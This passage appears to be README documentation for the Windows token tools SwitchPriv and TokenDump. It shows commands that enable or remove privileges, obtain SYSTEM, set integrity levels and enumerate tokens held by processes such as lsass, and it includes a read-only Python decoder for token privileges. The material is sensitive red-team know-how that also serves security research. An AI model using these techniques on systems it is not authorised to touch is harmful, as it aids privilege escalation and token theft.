[>] Trying to enable SeUndockPrivilege.
[*] Target PID : 6968
[*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.
To list the current token privileges of the target process, run the tool with the `--get` flag:
C:\dev>SwitchPriv.exe -p 6968 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 6968
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
To perform any of these actions as SYSTEM (for example against a service process you could not otherwise open), set the `--system` flag:
C:\dev>SwitchPriv.exe -p 1140 -g -s
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 1140
[*] Process Name : svchost
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 28 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
To disable a privilege, for example SeChangeNotifyPrivilege, run the tool with the `--disable` option. Note that disabling leaves the privilege present in the token (EnabledByDefault is still reported); only `--remove` takes it out:
C:\dev>SwitchPriv.exe -p 8520 -d changenotify
[>] Trying to disable SeChangeNotifyPrivilege.
[*] Target PID : 8520
[*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.
C:\dev>SwitchPriv.exe -p 8520 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 8520
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ================
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege EnabledByDefault
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
If you don't specify the `--pid` option, the tool targets its own parent process (the shell you run it from):
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\dev>SwitchPriv.exe -e timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Target PID : 9468
[*] Process Name : cmd
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Enabled
C:\dev>SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9468
[*] Process Name : cmd
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
To remove a privilege, use the `--remove` option. Removal is permanent for that token; a removed privilege cannot be re-enabled from user mode:
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Enabled
C:\dev>SwitchPriv.exe -r timezone
[>] Trying to remove SeTimeZonePrivilege.
[*] Target PID : 9788
[*] Process Name : cmd
[+] SeTimeZonePrivilege is removed successfully.
[*] Done.
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
To enable, disable or remove all available token privileges, specify all as the value of the --enable, --disable or --remove option:
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\dev>SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 9788
[*] Process Name : cmd
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
To find processes that hold a specific privilege, use the --find option as follows:
C:\dev>SwitchPriv.exe -f createtoken
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] csrss (PID : 800)
[*] smss (PID : 660)
[*] lsass (PID : 1088)
[*] Memory Compression (PID : 3600)
[*] csrss (PID : 868)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.
C:\dev>SwitchPriv.exe -g -p 800
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 800
[*] Process Name : csrss
[+] Got 30 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
To set the integrity level, use the --integrity option as follows:
C:\dev>whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\dev>SwitchPriv.exe -i 1
[>] Trying to set integrity level.
|-> Target PID : 5144
|-> Process Name : cmd
[>] Trying to set LOW_MANDATORY_LEVEL.
[+] LOW_MANDATORY_LEVEL is set successfully.
C:\dev>whoami /groups | findstr /i level
Mandatory Label\Low Mandatory Level Label S-1-16-4096
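The tables above are the kernel's LUID_AND_ATTRIBUTES array rendered as text, and the --integrity option works on the S-1-16-<rid> label SID shown by whoami /groups. The following Python is an added example, not SwitchPriv's or PrivFu's code: it reproduces that decoding offline (the attribute bits and SE_*_PRIVILEGE LUID values come from winnt.h; the WELL_KNOWN_PRIVILEGES table, the INTEGRITY_LEVELS map and the helper names are this example's own) and, on Windows only, queries the current process token read-only with TOKEN_QUERY so you can compare its output with `SwitchPriv.exe -g`.

```python
"""Decode token privilege state and integrity labels (added example, not PrivFu code).

Reproduces the decoding SwitchPriv -g and `whoami /priv` perform on a TOKEN_PRIVILEGES
buffer and maps integrity-label SIDs (S-1-16-<rid>) to names. read_current_token_privileges()
is Windows-only and read-only: it opens the current token with TOKEN_QUERY and changes nothing.
"""
import ctypes
import struct
import sys

# LUID_AND_ATTRIBUTES.Attributes bits (winnt.h).
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_REMOVED = 0x00000004
SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000

# SE_*_PRIVILEGE LUID values from winnt.h (subset), for offline name resolution.
WELL_KNOWN_PRIVILEGES = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege", 7: "SeTcbPrivilege",
    9: "SeTakeOwnershipPrivilege", 18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 23: "SeChangeNotifyPrivilege", 25: "SeUndockPrivilege",
    29: "SeImpersonatePrivilege", 33: "SeIncreaseWorkingSetPrivilege", 34: "SeTimeZonePrivilege",
}

# Last sub-authority of S-1-16-<rid> for each integrity label.
INTEGRITY_LEVELS = {
    0x0000: "Untrusted Mandatory Level", 0x1000: "Low Mandatory Level",
    0x2000: "Medium Mandatory Level", 0x2100: "Medium Plus Mandatory Level",
    0x3000: "High Mandatory Level", 0x4000: "System Mandatory Level",
    0x5000: "Protected Process Mandatory Level",
}


class LUID(ctypes.Structure):
    _fields_ = [("LowPart", ctypes.c_uint32), ("HighPart", ctypes.c_int32)]


def decode_privilege_state(attributes):
    """Render an Attributes DWORD the way SwitchPriv's State column does."""
    if attributes & SE_PRIVILEGE_REMOVED:
        return "Removed"
    parts = []
    if attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT:
        parts.append("EnabledByDefault")
    if attributes & SE_PRIVILEGE_ENABLED:
        parts.append("Enabled")
    if attributes & SE_PRIVILEGE_USED_FOR_ACCESS:
        parts.append("UsedForAccess")
    return ", ".join(parts) if parts else "Disabled"


def build_token_privileges(entries):
    """Pack [(luid, attributes)] into a TOKEN_PRIVILEGES buffer (inverse of the parser)."""
    body = b"".join(struct.pack("<IiI", luid & 0xFFFFFFFF, luid >> 32, attrs)
                    for luid, attrs in entries)
    return struct.pack("<I", len(entries)) + body


def parse_token_privileges(buf):
    """Parse TOKEN_PRIVILEGES: DWORD PrivilegeCount, then 12-byte
    LUID_AND_ATTRIBUTES { DWORD LowPart; LONG HighPart; DWORD Attributes } entries."""
    (count,) = struct.unpack_from("<I", buf, 0)
    entries = []
    for i in range(count):
        low, high, attrs = struct.unpack_from("<IiI", buf, 4 + 12 * i)
        entries.append(((high << 32) | low, attrs))
    return entries


def privilege_name(luid):
    """LookupPrivilegeNameW on Windows, the static table elsewhere."""
    if sys.platform == "win32":
        raw = LUID(luid & 0xFFFFFFFF, luid >> 32)
        name, size = ctypes.create_unicode_buffer(256), ctypes.c_uint32(256)
        if ctypes.windll.advapi32.LookupPrivilegeNameW(None, ctypes.byref(raw), name, ctypes.byref(size)):
            return name.value
    return WELL_KNOWN_PRIVILEGES.get(luid, f"Unknown({luid:#x})")


def privilege_state_table(buf):
    """Rows of the PRIVILEGES INFORMATION table: [(name, state)]."""
    return [(privilege_name(luid), decode_privilege_state(attrs))
            for luid, attrs in parse_token_privileges(buf)]


def integrity_level_from_sid(sid):
    """Map an integrity-label SID such as S-1-16-8192 to its display name."""
    if not sid.startswith("S-1-16-"):
        raise ValueError(f"not an integrity label SID: {sid}")
    rid = int(sid[len("S-1-16-"):])
    return INTEGRITY_LEVELS.get(rid, f"Unknown Mandatory Level ({rid:#x})")


def read_current_token_privileges():
    """Windows only: query (never modify) the current process token's privileges."""
    TOKEN_QUERY, TokenPrivileges = 0x0008, 3
    k32, adv = ctypes.windll.kernel32, ctypes.windll.advapi32
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    adv.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
    adv.GetTokenInformation.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p,
                                        ctypes.c_uint32, ctypes.POINTER(ctypes.c_uint32)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    token = ctypes.c_void_p()
    if not adv.OpenProcessToken(k32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError()
    try:
        needed = ctypes.c_uint32(0)
        adv.GetTokenInformation(token, TokenPrivileges, None, 0, ctypes.byref(needed))  # size probe
        buf = ctypes.create_string_buffer(needed.value)
        if not adv.GetTokenInformation(token, TokenPrivileges, buf, needed.value, ctypes.byref(needed)):
            raise ctypes.WinError()
        return privilege_state_table(buf.raw)
    finally:
        k32.CloseHandle(token)


if __name__ == "__main__":
    # Off Windows, decode a constructed buffer modelled on the README's medium-integrity cmd.exe.
    rows = (read_current_token_privileges() if sys.platform == "win32" else
            privilege_state_table(build_token_privileges([(19, 0), (23, 3), (25, 0), (33, 0), (34, 2)])))
    for name, state in rows:
        print(f"{name:<32} {state}")
```

The parser works on the raw bytes GetTokenInformation returns, so the same function serves a live token on Windows and a captured buffer (for instance from a memory dump) elsewhere; note that a privilege with the SE_PRIVILEGE_REMOVED bit set is exactly what SwitchPriv --remove leaves behind, and unlike a disabled one it cannot be re-enabled.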
TokenDump
This tool is a utility to inspect token information:
C:\Dev>.\TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
To enumerate the tokens of all processes, just set the -e flag:
C:\Dev>.\TokenDump.exe -e
[>] Trying to enumerate process token.
PID Process Name Token User Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3016 sihost.exe X64DEV\user Medium False False
860 fontdrvhost.exe Font Driver Host\UMFD-0 Low False True
428 msedgewebview2.exe X64DEV\user Low True False
--snip--
5612 Widgets.exe X64DEV\user Medium False False
2588 svchost.exe NT AUTHORITY\LOCAL SERVICE System False False
9052 RuntimeBroker.exe X64DEV\user Medium False False
[+] Got 157 token information.
[*] Found 7 account(s).
[*] X64DEV\user
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\LOCAL SERVICE
[*] Font Driver Host\UMFD-1
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] Done.
If you want to enable SeDebugPrivilege, set the -d flag as follows:
C:\Dev>.\TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Process Name Token User Integrity Restricted AppContainer
==== =========================== ============================ ========= ========== ============
3544 svchost.exe NT AUTHORITY\SYSTEM System False False
6944 WmiPrvSE.exe NT AUTHORITY\SYSTEM System False False
3188 SystemInformer.exe X64DEV\user Medium False False
7608 sppsvc.exe NT AUTHORITY\NETWORK SERVICE System False False
6948 SecurityHealthSystray.exe X64DEV\user Medium False False
7228 svchost.exe X64DEV\user Medium False False
--snip--
When the -H flag is set together with the -e flag, TokenDump enumerates token handle information:
C:\Dev>.\TokenDump.exe -e -H
[>] Trying to enumerate token handles.
[Token Handle(s) - svchost.exe (PID: 2808)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== =========== ========= ========== ============ ============= ===================
0x4AC X64DEV\user Medium False False Primary Anonymous
0x50C X64DEV\user Medium False False Primary Anonymous
0x510 X64DEV\user Medium False False Primary Anonymous
0x514 X64DEV\user Medium False False Primary Anonymous
--snip--
[Token Handle(s) - msedgewebview2.exe (PID: 9804)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== =========== ========= ========== ============ ============= ===================
0x7D4 X64DEV\user Low True False Impersonation Impersonation
0x7D8 X64DEV\user Low True False Primary Anonymous
0xBCC X64DEV\user Low True False Impersonation Impersonation
0xBDC X64DEV\user Low True False Primary Anonymous
0xCF8 X64DEV\user Low True False Impersonation Impersonation
0xD00 X64DEV\user Low True False Primary Anonymous
[+] Got 910 handle(s).
[*] Found 7 account(s).
[*] NT AUTHORITY\SYSTEM
[*] X64DEV\user
[*] NT AUTHORITY\LOCAL SERVICE
[*] Font Driver Host\UMFD-1
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] Done.
To enumerate impersonation tokens applied to threads, set the -T flag together with the -e flag as follows:
C:\Dev>.\TokenDump.exe -e -T
[>] Trying to enumerate thread tokens.
PID TID Process Name Token User Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
6552 5668 TokenStealing.exe NT AUTHORITY\SYSTEM System Impersonation
[+] Got 1 handle(s).
[*] Found 1 account(s).
[*] NT AUTHORITY\SYSTEM
[*] Done.
To filter these results by token user name, pass the filter string as the -a option value as follows:
C:\Dev>.\TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Process Name Token User Integrity Restricted AppContainer
==== ============ ============================ ========= ========== ============
3404 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
4656 msdtc.exe NT AUTHORITY\NETWORK SERVICE System False False
1628 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
2916 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
2464 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
4592 WmiPrvSE.exe NT AUTHORITY\NETWORK SERVICE System False False
7840 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
7408 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
940 svchost.exe NT AUTHORITY\NETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] X64DEV\user
[*] Font Driver Host\UMFD-0
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\LOCAL SERVICE
[*] Font Driver Host\UMFD-1
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] Done.
C:\Dev>.\TokenDump.exe -e -a network -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 704)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ============================ ========= ========== ============ ============= ===================
0x8C4 NT AUTHORITY\NETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 7408)]
Handle Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ============================ ========= ========== ============ ========== ===================
0xB0 NT AUTHORITY\NETWORK SERVICE System False False Primary Anonymous
[+] Got 29 handle(s).
[*] Found 7 account(s).
[*] NT AUTHORITY\SYSTEM
[*] X64DEV\user
[*] Font Driver Host\UMFD-0
[*] Font Driver Host\UMFD-1
[*] NT AUTHORITY\NETWORK SERVICE
[*] Window Manager\DWM-1
[*] NT AUTHORITY\LOCAL SERVICE
[*] Done.
To get verbose information for a specific process, set the -s flag and pass the target PID as the -p option value:
C:\Dev>.\TokenDump.exe -s -p 5520
[>] Trying to dump process token information.
[Token Information for ShellExperienceHost.exe (PID: 5520)]
ImageFilePath : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
CommandLine : "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Token User : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Primary Group : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x00000000002FCAC9
Authentication ID : 0x000000000001E809
Original ID : 0x00000000000003E7
Modified ID : 0x00000000002FCAB9
Integrity Level : Low
Session ID : 1
Elevation Type : Limited
Elevated : False
Restricted : False
AppContainer : True
AppContainer Name : microsoft.windows.shellexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708
AppContainer Number : 6
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001E500
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
X64DEV\None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account and member of Administrators group UseForDenyOnly
BUILTIN\Administrators UseForDenyOnly
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\INTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\LogonSessionId_0_124092 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\NTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory Label\Low Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
================================================================================ =======
NAMED CAPABILITIES\GlobalMediaControl Enabled
APPLICATION PACKAGE AUTHORITY\Software and hardware certificates or a smart card Enabled
NAMED CAPABILITIES\RemoteSystem Enabled
APPLICATION PACKAGE AUTHORITY\Your pictures library Enabled
NAMED CAPABILITIES\ActivitySystem Enabled
NAMED CAPABILITIES\BluetoothDeviceSettings Enabled
NAMED CAPABILITIES\PackageQuery Enabled
NAMED CAPABILITIES\CellularDeviceControl Enabled
NAMED CAPABILITIES\CellularDeviceIdentity Enabled
NAMED CAPABILITIES\NetworkDeviceSettings Enabled
NAMED CAPABILITIES\AppointmentsSystem Enabled
NAMED CAPABILITIES\EnterpriseCloudSSO Enabled
NAMED CAPABILITIES\ChatSystem Enabled
NAMED CAPABILITIES\ContactsSystem Enabled
NAMED CAPABILITIES\EmailSystem Enabled
NAMED CAPABILITIES\PhoneCallHistorySystem Enabled
NAMED CAPABILITIES\InputInjection Enabled
NAMED CAPABILITIES\UserDataAccountSetup Enabled
NAMED CAPABILITIES\UserWebAccounts Enabled
NAMED CAPABILITIES\ShellExperience Enabled
NAMED CAPABILITIES\CloudStore Enabled
NAMED CAPABILITIES\CortanaSettings Enabled
NAMED CAPABILITIES\PackageContents Enabled
NAMED CAPABILITIES\TargetedContent Enabled
NAMED CAPABILITIES\UserAccountInformation Enabled
APPLICATION PACKAGE AUTHORITY\Your Internet connection Enabled
NAMED CAPABILITIES\Location Enabled
NAMED CAPABILITIES\VisualElementsSystem Enabled
NAMED CAPABILITIES\ActivityData Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Radios Enabled
NAMED CAPABILITIES\WiFiControl Enabled
NAMED CAPABILITIES\CellularData Enabled
NAMED CAPABILITIES\WifiData Enabled
NAMED CAPABILITIES\BluetoothAdapter Enabled
NAMED CAPABILITIES\BluetoothSync Enabled
PACKAGE CAPABILITY\microsoft.windows.shellexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIES\AccessoryManager Enabled
NAMED CAPABILITIES\AccessoryManager Enabled
NAMED CAPABILITIES\Contacts Enabled
NAMED CAPABILITIES\Email Enabled
NAMED CAPABILITIES\PhoneCallHistory Enabled
NAMED CAPABILITIES\UserAccountInformation Enabled
NAMED CAPABILITIES\ID_CAP_LOCATION Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Bluetooth Enabled
NAMED CAPABILITIES\Radios Enabled
NAMED CAPABILITIES\WiFiControl Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================================================== =========================== ===== =============
X64DEV\user GenericAll None AccessAllowed
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
NT AUTHORITY\LogonSessionId_0_124092 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.shellexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
[Linked Token Information for ShellExperienceHost.exe (PID: 5520)]
Token User : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner : BUILTIN\Administrators (SID: S-1-5-32-544)
Primary Group : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x0000000000E9BC5F
Authentication ID : 0x000000000001E798
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001E808
Integrity Level : High
Session ID : 1
Elevation Type : Full
Elevated : True
Restricted : False
AppContainer : False
Token Source : User32
Token Source ID : 0x000000000001E500
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
X64DEV\None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTIN\Administrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\INTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Local account Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\LogonSessionId_0_124092 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\NTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory Label\High Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTIN\Administrators GenericAll None AccessAllowed
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
